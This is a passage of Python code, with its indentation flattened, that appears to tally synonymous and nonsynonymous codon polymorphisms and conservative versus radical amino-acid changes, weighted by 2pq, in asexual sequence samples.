asex_sum2PQ_C3 = 0
asex_sum2PQ_C4 = 0
asex_sum2PQ_C5 = 0
asex_sum2PQ_C6 = 0
asex_sum2PQ_C7 = 0
asex_sum2PQ_R1 = 0
asex_sum2PQ_R2 = 0
asex_sum2PQ_R3 = 0
asex_sum2PQ_R4 = 0
asex_sum2PQ_R5 = 0
asex_sum2PQ_R6 = 0
asex_sum2PQ_R7 = 0
asex_sum2PQ_meanC = 0
asex_sum2PQ_meanR = 0
asex_synS = 0
asex_nsynS = 0
asex_con1S = 0
asex_con2S = 0
asex_con3S = 0
asex_con4S = 0
asex_con5S = 0
asex_con6S = 0
asex_con7S = 0
asex_meanConS = 0
asex_rad1S = 0
asex_rad2S = 0
asex_rad3S = 0
asex_rad4S = 0
asex_rad5S = 0
asex_rad6S = 0
asex_rad7S = 0
asex_meanRadS = 0
i = 0
while i < len(codonDict[seqList[0]]):
outCodon = outCodons[i]
gene = False
for locus in positionDict:
start = locus[0]
stop = locus[1]
if i*3 >= start and i*3 <= stop:
gene = positionDict[locus]
currAlleleDict = {}
currAlleleList = []
currAADict = {}
for seq in asexList:
currCodons = codonDict[seq]
currCodon = currCodons[i]
if currCodon not in currAlleleDict and 'N' not in currCodon and '-' not in currCodon:
currAlleleDict[currCodon] = 1
currAlleleList.append(currCodon)
elif 'N' not in currCodon and '-' not in currCodon:
currValue = currAlleleDict[currCodon]
currValue += 1
currAlleleDict[currCodon] = currValue
if len(currAlleleDict) > 1:
totalIndividuals = 0
site1 = []
site2 = []
site3 = []
for codon in currAlleleList:
totalIndividuals += currAlleleDict[codon]
if codon[0] not in site1:
site1.append(codon[0])
if codon[1] not in site2:
site2.append(codon[1])
if codon[2] not in site3:
site3.append(codon[2])
currFreqDict = {}
totalChanges = (len(site1) - 1) + (len(site2) - 1) + (len(site3) - 1)
variableSites = []
if len(site1) > 1:
variableSites.append(i*3)
if len(site2) > 1:
variableSites.append((i*3) + 1)
if len(site3) > 1:
variableSites.append((i*3) + 1)
aaList = []
twoPQ = 2
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
if i == 0 and codon in startCodons:
aa = 'M'
else:
aa = geneticCode[codon]
currAADict[codon] = aa
if aa not in aaList:
aaList.append(aa)
if totalChanges == 1:
for codon in currAlleleDict:
freq = float(currAlleleDict[codon])/totalIndividuals
currFreqDict[codon] = freq
twoPQ *= freq
if len(aaList) == 1:
asex_synS += 1
asex_sum2PQ_S += twoPQ
else:
asex_nsynS += 1
asex_sum2PQ_N += twoPQ
mutType = CRI(aaList) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ
elif totalChanges == 2:
if len(currAlleleDict) == 3:
ab = 0
ac = 0
bc = 0
codonA = currAlleleList[0]
codonB = currAlleleList[1]
codonC = currAlleleList[2]
if codonA[0] != codonB[0]:
ab += 1
if codonA[1] != codonB[1]:
ab += 1
if codonA[2] != codonB[2]:
ab += 1
if codonA[0] != codonC[0]:
ac += 1
if codonA[1] != codonC[1]:
ac += 1
if codonA[2] != codonC[2]:
ac += 1
if codonC[0] != codonB[0]:
bc += 1
if codonC[1] != codonB[1]:
bc += 1
if codonC[2] != codonB[2]:
bc += 1
if ab == ac and ac == bc:
if 'N' not in outCodon and '-' not in outCodon:
if outCodon == codonA:
aaList1 = [currAADict[codonA],currAADict[codonB]]
aaList2 = [currAADict[codonA],currAADict[codonC]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif outCodon == codonB:
aaList1 = [currAADict[codonB],currAADict[codonA]]
aaList2 = [currAADict[codonB],currAADict[codonC]]
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif outCodon == codonC:
aaList1 = [currAADict[codonC],currAADict[codonA]]
aaList2 = [currAADict[codonC],currAADict[codonB]]
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
else:
if ab > ac and ab > bc:
codonList1 = [codonC,codonB]
codonList2 = [codonC,codonA]
elif ac > ab and ac > bc:
codonList1 = [codonB,codonA]
codonList2 = [codonB,codonC]
elif bc > ab and bc > ac:
codonList1 = [codonA,codonB]
codonList2 = [codonA,codonC]
aaList1 = []
aaList2 = []
for comp in codonList1:
if i < 3:
if comp in startCodons:
aaList1.append('M')
else:
aaList1.append(geneticCode[comp])
else:
aaList1.append(geneticCode[comp])
for comp in codonList2:
if i < 3:
if comp in startCodons:
aaList2.append('M')
else:
aaList2.append(geneticCode[comp])
else:
aaList2.append(geneticCode[comp])
if aaList1[0] == aaList1[1]:
if aaList2[0] == aaList2[1]:
asex_synS += 2
twoPQ = 4
for allele in currFreqDict:
twoPQ *= currFreqDict[allele]
asex_sum2PQ_S += twoPQ
else:
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #syn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_S += twoPQ1
asex_sum2PQ_N += twoPQ2
asex_synS += 1
asex_nsynS += 1
mutType = CRI(aaList2) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ2
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ2
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ2
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ2
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ2
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ2
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ2
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ2
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ2
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ2
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ2
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ2
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ2
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ2
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ2
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ2
elif aaList2[0] == aaList2[1]:
asex_nsynS += 1
asex_synS += 1
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #syn
asex_sum2PQ_S += twoPQ2
asex_sum2PQ_N += twoPQ1
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
if mutType[6] == 0:
asex_con7S += 1
asex_sum2PQ_C7 += twoPQ1
else:
asex_rad7S += 1
asex_sum2PQ_R7 += twoPQ1
if mutType[7] <= 0.5:
asex_meanConS += 1
asex_sum2PQ_meanC += twoPQ1
else:
asex_meanRadS += 1
asex_sum2PQ_meanR += twoPQ1
else:
asex_nsynS += 2
twoPQ1 = 2*currFreqDict[codonList1[1]]*(1-currFreqDict[codonList1[1]]) #nsyn
twoPQ2 = 2*currFreqDict[codonList2[1]]*(1-currFreqDict[codonList2[1]]) #nsyn
asex_sum2PQ_N += twoPQ1 + twoPQ2
mutType = CRI(aaList1) #[1,2,3,4,5,6,7,cri]
if mutType[0] == 0:
asex_con1S += 1
asex_sum2PQ_C1 += twoPQ1
else:
asex_rad1S += 1
asex_sum2PQ_R1 += twoPQ1
if mutType[1] == 0:
asex_con2S += 1
asex_sum2PQ_C2 += twoPQ1
else:
asex_rad2S += 1
asex_sum2PQ_R2 += twoPQ1
if mutType[2] == 0:
asex_con3S += 1
asex_sum2PQ_C3 += twoPQ1
else:
asex_rad3S += 1
asex_sum2PQ_R3 += twoPQ1
if mutType[3] == 0:
asex_con4S += 1
asex_sum2PQ_C4 += twoPQ1
else:
asex_rad4S += 1
asex_sum2PQ_R4 += twoPQ1
if mutType[4] == 0:
asex_con5S += 1
asex_sum2PQ_C5 += twoPQ1
else:
asex_rad5S += 1
asex_sum2PQ_R5 += twoPQ1
if mutType[5] == 0:
asex_con6S += 1
asex_sum2PQ_C6 += twoPQ1
else:
asex_rad6S += 1
asex_sum2PQ_R6 += twoPQ1
